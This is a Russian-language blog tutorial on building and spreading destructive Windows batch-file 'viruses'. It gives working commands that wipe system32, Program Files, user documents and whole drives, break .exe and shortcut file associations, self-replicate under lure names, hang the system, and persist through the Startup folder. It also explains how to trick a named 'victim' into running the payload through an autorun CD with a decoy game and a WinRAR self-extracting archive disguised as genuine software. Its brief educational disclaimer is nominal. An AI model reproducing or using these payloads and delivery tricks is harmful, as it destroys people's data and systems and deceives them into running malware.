Как создать простейший вирус на пк?

02.05.2018

Привет всем!Сегодня решил написать статью о простейшем вирусе(его даже так не назовешь)И сразу предупреждаю пишу статью в ознакомительных целях и не побуждаю распространять вирус!Можете проверить его в виртуальной мишине!Зачем я пишу эту статью?- Многие не знают об этом и могут попасться на это!

В начале я расскажу как создать bat вирус:

1)открываешь блокнот

2)пишешь там команды - так называемое ТЕЛО вируса

3)дальше Файл -- Сохранить как -- и теперь пишешь имя и расширение т.е. *.bat

4)* (звездочка) это любое имя, как на английском, так и на русском.

Т.е. у тебя было так: Текстовый документ. txt (по умолчанию)

а ты сделай вот так: Текстовый документ. bat (батовский)

Но вы не тупые и конечно же поняли что необязательно называть "текстовый документ.bat" , можно к примеру назвать prikol.bat , или еще как нибудь. Ну там дальше работает фантазия... :)

Первая статья про написание бат вирусов.

Итак, чтобы создать бат вирус нужно открыть блокнот написать команды,и сохранить с разрешением .bat К командам существуют и специальные параметры определяющие как команда будет выполняться. Вот например после команды start мы видим параметр /min - он запускает приложение, но в свёрнутом виде. Если за место него мы написали бы /max, то приложение соответственно запустилось во весь экран, развёрнутое. У команды start ещё есть с десяток параметров, но о них я вам говорить не стану т.к. они нам не чем не помогут (зачем нам задавать приоритет приложения?). В таблице написано приложение и команда которая его запускает:

Настройка системы - start msconfig

Калькулятор - calc

Помощь - start HelpCtr

Редактор символов - eudcedit

Таблица символов - charmap

Буфер обмена - clipbrd

Музон - dvdplay

Диспетчер задач - taskmgr

Громкость - sndvol32

Доктор Ватсон - drwatson

Отладчик доктора - drwtsn32

Дефрагментация диска С: - defrag C:

Проверка диска - chkdsk

И ещё чтоб вы знали. Как же всё это выполняется, ведь команд куча, все они требуют приложения которое будет их выполнять. Неужели это всё одна программа? Нет, программа "cmd" служит для того чтобы через неё запускать другие программы. Вот например есть такая команда mem, введите её и увидите сведения о памяти вашего компа. Так вот, этой командой заправляет отдельное приложение. Оно так и называется mem. Лежит это приложение в C:WINDOWS\system32 и есть ещё резервная копия по адресу: C:WINDOWSsystem32dllcache. Это для того чтобы восстановиться от нечаянного удаления нужных файлов. Так вот к чему рассказ, удалите в этих двух директориях приложение "mem.exe" и теперь введите в командную строку, вам не чего не покажут разве лишь только ошибку, или может даже то, что системного файла не хватает. Из этого следует вывод, если удалить приложения стирания, перемещения, то командные файлы у вас не сработают. Но я думаю "жертва" об этом даже не догадывается... Теперь приступим к написанию команд для человека, которому вы хотели бы сильно (или не очень сильно) навредить! Для начала напишем команду, которая не удаляет файлы, а просто ставит на них атрибут «Скрытый» и «Системный» и после запуска команды файлики исчезнут. Просто пишем:

attrib +h +s Используемые параметры в команде attrib:

+r Установка атрибута «Только чтение».

-r Снятие атрибута «Только чтение».

+a Установка атрибута «Архивный».

-a Снятие атрибута «Архивный».

+s Установка атрибута «Системный».

-s Снятие атрибута «Системный».

-h Снятие атрибута «Скрытый».

+h Установка атрибута «Скрытый».

Но мы будем только пользоваться двумя, может тремя. Давайте для начала скроем папку WINDOWS, чтобы перепуганный новичок орал «Х-де моя папка WINDOWS!» пишем:

attrib +h +s C:/WINDOWS

Или же можно скрыть файлы (вложенные папки остануться) в самой папке:

attrib +h +s C:/WINDOWS/*.*

можно поступить иначе:

cd C:windows переходим в папку «windows»

attrib +h +s и ставим атрибуты

У нас новая команда cd после неё пишем путь к директории и последующие команды будут применяться к этой папке. Почему надо ставить два атрибута? Достаточно поставить один "Скрытый" и он скроется? В принципе у ламера да, но если вы поставили в свойствах папки "Показывать скрытые файлы и папки", то фишка не прокатит, а с двумя параметрами файл можно только увидеть в FAR, или Commander (это файловые менеджеры).

А если мы хотим снять все атрибуты со всех файлов в этом каталоге, да и ещё и подкаталог? Для снятия или назначение атрибутов в подкаталоги надо воспользоваться параметром /s. Например для снятия всех атрибутов со всех файлов в этой папке и всех её подпапках пишем:

attrib -r -s -h -a *.* /s

Существует ещё одна загвоздка, а если на подпаке стоят атрибуты, то с неё команда снимет их? Нет, она не снимет не с этой папки, не с файлов которые в этой скрытой папке находятся. Поэтому нам нужен ещё один параметр для снятия атрибутов с папок /d. Например если мы хотим снять атрибуты ну со всего что только возможно в папки "Windows" нам надо написать:

attrib -r -s -h C:WINDOWS*.* /s /d

Ну не обязательно именно эта папка можно такую команду применить для других папок, например можно скрыть ненужный мусор, который следует удалить, а не как… ну об этом в главе: «Заполняем место мусором» Или какими он часто пользуется папками и файлами? Ну я думаю на "Рабочем столе" он держит кучу ярлыков. А если они исчезнут? Он их поставит опять, а мы сделаем запуск нашего вируса с каждым включением компа и сколько бы он раз заново не ставил свои ярлыки, они всё исчезают и исчезают,... но об этом потом.

Я думаю вы не станете биться в бешеном припадке если тестируя вирус скроете свои папки... Просто напишите команду которая снимает атрибуты...

Безвозвратное удаление

Ну что, сейчас пойдут команды удаления. Интуиция вам подсказывает что удаление это плохо...

del *.* /q

После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в каталогах и подкаталогах. Параметр /q задаёт удаление без подтверждения. Теперь мы удалим шрифты:

del C:windowsfonts /q

Почему без /s ? А зачем, там нет подпапок. Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

del C:windowsMedia /q

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

del C:windowssystem32 /q /s

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечаянного стирания). Что в этом случае делать? Придётся сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога. Надеюсь вы помните главу "Хд-е мои файлы"? Командой del мы хоть и удаляем файлы, а папки то останутся, но есть команда которая стирает папки вместе с файлами:

rd C:windowsMedia /s /q и все папочки и файлики удаляться. Вы спросите, ну если команда rd так хороша, зачем нужна команда del ? Ответ прост, вы попробуйте удалить командой rd , допустим только ярлыки рабочего стола, или только рисунки в папке windows. Командой del это делается так:

del C:windows*.bmp /q /s И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы, об этом в главе "Маски" Файл можно ещё и просто не удаляя переместить, например:

move C:WINDOWS*.txt C:Text /y На команде видно что мы перемещаем все текстовые файлы в папку "Text" на диске C: (в папке WINDOWS их уже не будет, это же перемещение, где взяли там уже нет). Что интересно мы наносим такой же вред как и при удалении ведь комп будет считать что там этих файлов уже нет. (Правда удалять быстрее). Параметр /y выключает предупреждения о перезаписи, если вдруг имена совпадут.

А теперь попробуйте догадаться что попытается сделать эта команда:

rd C: /s /q

И ещё напоследок чтобы хорошенько усвоили, комп не даёт вам просто так удалять системные и скрытые файлы, надо сначала снять все атрибуты. Иначе облом. Но этот процесс офигеть длительный так что лучше снимать только с определённых файлов, но это надо знать с каких. Так что чтобы написать вирус вам надо самим знать какие файлы системные и стандартные. Прочитать много книг и... убить Билла Гейца и занять его пост!

Премудрости удаления

Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить… Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h -r C:*.*

del C:*.* /q

Но тут нам много удалить не дадут. Всё триста раз защищено. Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q А вот если написать:

rd C:Program Files /s /q то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное: Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст. del "%USERPROFILE%Мои документы*.*" /q /s

Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles% И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251

А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде: for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).

Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "ламер" его удаляет, а он при загрузке появляется снова. А если "ламер" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "ламер" вопросы о перезаписи... "ламер" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.

if not VIR*?????????.sys goto x

exit

:x

МУСОР.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова. Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора. p>И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" ; "P" ; "Q" ; "R" ; "S" ; "T" ; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна. Маленькие команды Тут написаны команды для которых отдельная глава много...

Самоликвидация

Эта команда удаляет сама себя, пишите её в самом конце вашего вируса и всё, ни кто не узнает, что вы испортили на его компе чтобы сразу эту пакость не исправить.

del %0

Клонирование

Эта команда копирует себя в другое место. Так можно наклонироваться по всему диску, Нет, нет, да кто нибудь запустит интересный "setup" или "games"

copy %0 C:setup.bat

copy %0 D:games.bat

copy %0 C:windows/sex.bat ну и.т.д.

Можно изменить текущее время на своё:

time 00:00

Можно изменить текущую дату:

date 01.01.50

chcp 1251

cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"

md 1 ….и.т.д.

допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их

Пытаемся повесить систему

Как я уже говорил в начальной главе чтобы запустить какую-нибудь программу надо написать start в начале строки и команду например:

Start mspaint и Paint откроется

А что если задать компу открыть сразу 50, или 100 Paint(ов) силёнок хватит не у всех. Можно конечно написать вот таких 100 строк: Start mspaint но этого мы делать не будем не волнуйтесь. Мы напишет вот такое:

:x ставим начальную точку

Start mspaint пишем команду (в данном случае это открытие Paint(а)

goto x говорим чтобы комп начинал всё с начальной точки

Этим самым у нас получаеться бесконечный цикл открытия приложения и попытка зависания компа.

CD с вирусом.

А вот например если мы хотим «подарить» ваш великолепно выполненный вирус определённому человеку, да ещё вдобавок не по сети, а дать его на диске, то можно ещё кое как фишкануть… кстати говоря чтобы жертва на вас не злилась можно на диске действительно записать какую-нибудь небольшую игру, возможно он успеет поиграть в неё, и как не в чём не бывало отключить комп... Но он его больше не включит. У вас есть прикрытие вы скажете мол установка игрухи прошла криво. Описание ближайшего будущего: Наша жертва берёт наш диск и засовывает его в дисковод и как обычно ждёт когда комп прочтёт диск и запустит его, а тем временем наш диск ка-а-а-ак запустит автоматически наш вирус и всё удалит…ну или создаст много мусора… вот такая хрень… Для этого мы откроем блокнот и напишем там следующие:

[autorun]

OPEN=virus.bat

Имя, которое у меня стоит «virus» может быль любое, например «1». Вспомните когда мы вставляем диск с какоё-либо игрой то после открытия «Моего компа» на том месте, где был обычный значок диска, появляется значок игры…вот и мы можем также сделать засунуть значок, на диск, обозвав его «znak» и добавляем в нашем файле строку:

ICON=znak.ico

Потом сохраняем наш файл, дав ему имя AUTORUN и расширение .inf Для особо тупых:

[autorun]

OPEN=virus.bat

ICON=znak.ico

Всё это будет сохранено AUTORUN.inf

Потом берём и записываем на диск наши четыре компонента:

virus.bat наш с вами «мощненький вирусик»

znak.ico какой нибуть красивый значок

AUTORUN.inf автомат запуска вируса

Игра... можете и не записывать.

Вирус, тут желательно делать такой который создаёт много мусора типа это игра столько занимает, которую вы предварительно запишите на диск. И ещё в коде надо прописать запуск установки игры, чтобы при включении диска у нас запустилась установка и вирус. Правда после её удаления место существенно не прибавиться и только мы знаем почему. Преимущество такого вот способа состоит в том, что длительный процесс создания мусора можно сослать непосредственно на распаковку игры.

Опасные bat вирусы

продолжение...

Здесь будут представлены более сложные команды

1.

Shutdown -f -Эта команда выключает компьютер

del *.* /q -После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в каталогах и подкаталогах. Параметр /q задаёт удаление без подтверждения.

Теперь мы удалим шрифты:

del C:windowsfonts /q

Почему без /s ? А зачем, там нет подпапок. Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:

del C:windowsMedia /q

Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.

del C:windowssystem32 /q /s

Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох, если на файле будут стоять атрибуты "Скрытый" и "Системный" то наше удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечаянного стирания). Что в этом случае делать? Придётся сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.

del C:windows*.bmp /q /s

И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.

Премудрости удаления

Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить… Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит ничего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:

attrib -a -s -h -r C:*.*

del C:*.* /q

Но тут нам много удалить не дадут. Всё триста раз защищено.

Можно, например, попробовать удалить УСТАНОВЛЕННЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:

rd %ProgramFiles% /s /q

А вот если написать:

rd C:Program Files /s /q

то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно, у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы", то вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:

Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.

del "%USERPROFILE%Мои документы*.*" /q /s

Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корневой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%. И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp1251

А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде:

for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q

Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну, суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).

Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то снова создаст мусор.

if not VIR*?????????.sys goto x

exit

:x

МУСОР.

Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова. Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора.

И ещё, я что то всё говорю путь диск C:, диск C:, но для полной уверености можно, я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" ; "P" ; "Q" ; "R" ; "S" ; "T" ; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна.

rd C: /s /q -а это главная команда удаления, ведь она может отформатировать диск за 10-20 сек в зависимости от объема диска

chcp 1251

cd "%USERPROFILE%Главное менюПрограммы"

md 1 …и.т.д.

и папки будут создаваться в разделе программы.

Или допишите вот так…

chcp 1251

cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"

md 1 ….и.т.д.

Допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, да так сдохнуть можно каждый раз их закрывая!

Удалим расширение

Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно! Вы только представьте, чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…

assoc .lnk=.avi

здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!

assoc .exe=.avi

тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi Вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…

Можно же просто удалить расширение, не заменяя его на другое:

assoc .exe=

После знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик. Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые) Здесь я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои:

Приложение .exe .com

Текстовые файлы doc .txt .wp .diz .log .wri

Музыкальные файлы .mp3 .wav .avi .wmv .mpg

Картинки .bmp .jpg .gif .tif .pic

Ярлыки .lnk .url

Архиваторы .rar .zip .arj .cab lzh.

Шрифты fon .ttf .atm

Файл реестра .reg .key

Системные файлы .sys .dll .rnf .drv .ega

Файл справки .chm .hlp

Можно путь для копирования поставить другой путь:

copy C:*.* C: program наш никчёмный файл появиться на диске С:

можно скопировать, что-нибудь другое:

copy C:windowssystem32*.* C:Microsoft*.exe

Видно что все файлы будь это текст, или музыка мы сохраняем как приложение *.exe. Но это уже очень длительный процесс (копировать всё из system32). Есть другой способ копирования:

dir c: /s/a > C:/1.txt

Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:

copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK

Мы видим что я беру из папки "Windows" все текстовые файлы а из папки "Help" вообще все файлы и слепливаю кусок из всех них в файл "KUSOK" (од даже будет без расширения, но можно его и сделать, если пожелаете)

А можно полностью скопировать папку "system32" в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.

xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.

attrib +h +s C:/mysor всё скрываем с глаз людских.

Если посмотреть, то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються, так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, а так как вопросы нам не нужны, вот мы влепили параметр /y.

Ах, совсем забыл, не пишите вот такую команду:

copy C:*.* C:Windows

А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.

Можно оповещать нашу жертву о ходе действия нашего вируса. Для этого есть команда msg. Например:

chcp1251

msg * Поздравляю, тебя взломали!

Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:

echo >> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.

start/max read.txt

Тут так же действует вывод сообщения, но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно не будет отвлекаться.

Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение "Для продолжения нажмите любую клавишу...".

pause

А теперь закинем вирус в автозагрузку. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит и многократное выключение не удаться:

Chcp 1251

cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"

attrib +h

вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.

Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала - просто убрала все элементы и как будто их и не было.

И еще, бывает так: жертва открывает вирус, видит выскакивающее окно и быстренько его закрывает, и всё вирус не сработал! Но я нашёл способ чтоб окно не открывалось - нужно вписать скрипт в самораспоковывающийся архив и именно его архив и должен открыть, а скрипт этот мы будем писать на vbs его можно создать в блокноте а прописывать мы там будем Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run"C:sistem32Connect.bat ", 0, true

Ну вот и все! Кстати протестировать получившийся вирус у себя на компе можно на виртуальной машине. Что это такое и скачать бесплатно виртуальную машину можно там же. Ну а на следующем уроке поговорим как сделать из этого вируса настоящее exe приложение с лицензионным соглашением. А то отослали вы вирус жертве, а она его не открыла потому что значок какой то странный и расширение неизвестное... Я вас научу как сделать так, чтоб у жертвы не было ни малейшего сомнения! Итак приступим...

А теперь я покажу как сделать из этого "вируса" настоящее приложение! А то вот отослали мы вирус жертве, а она его не открыла т.к. значок какой то странный и весит то мало... Дак вот теперь мы добавим нашему вирусу солидности - теперь он будет весить побольше - не 1 Кб, а около 45Кб (ну туда можно еще всяких картинок и музыки для веса дофига запихать, но сделать так, чтобы при распаковке это удалилось), с расширением exe (как все нормальные программы) и даже лицензионным соглашением! Использовать мы будем архиватор WinRaR. Его можно скачать с официального сайта или можно скачать бесплатно WinRaR с моего сайта. Ну, приступим:

1) Кликаешь на вирус правой кнопкой мыши и выбираешь "создать архив..."

2) В открывшемся окне поставь флажок возле окна "создать SFX-архив"

3) В окне "имя архива" пишешь название будущей программы (или игры - как вы там это другу представите)

4) Потом выбираешь вкладку "Дополнительно" (это в самом верху) и в этом окне выбираешь "параметры SFX"

5) В открывшемся окне в окошечке "путь для распаковки" ставишь флажок возле "создать в текущей папке"

6) В окошечке "выполнить после распаковки" пишешь имя вируса. Обрати внимание именно вируса , а не приложения которое мы делаем! Иначе комп жертвы будет вечно запускать приложение а вот вирус так и не откроется. Внимательней!

7) Теперь идем во вкладку "лицензионное соглашение" и пишем там нечто скучное и длинное... Только писать надо без грамматических ошибок - лишнее подозрение нам не нужно!

8) Переходим в "текст и значок". Там пишем текст который будет в окне программы - непосредственно само описание "продукта". А в поле значок нажимаем обзор, идем в папку со значками и выбираем значок к нашей программе. В принципе, выбирать значок и не обязательно

9) Этот шаг выполнять тоже в общем то необязательно. Но если хотим чтобы вирус был в Автозагрузке (снова и снова запускался при перезагрузке компа), то идем во вкладку "Дополнительно" и нажимаем "Добавить ярлык...". "Место создания ярлыка" - естественно Автозагрузка. "Имя файла, для которого будет создания ярлык:" здесь пишем имя вируса с расширением. "Имя ярлыка(файла .ink):" здесь пишем имя ярлычка, например FlashPlayer - ярлык то в автозагрузке будет. Остальные поля оставьте пустыми.

10) Ну и все! нажимаешь ОК, потом еще раз ОК и он тебе создает приложение! Настоящее приложение с расширением .exe , лицензионным соглашение и... вирусом который при желании может форматнуть все жесткие диски! Вот так вот!

На этом я свою статью заканчиваю и до следующей статьи!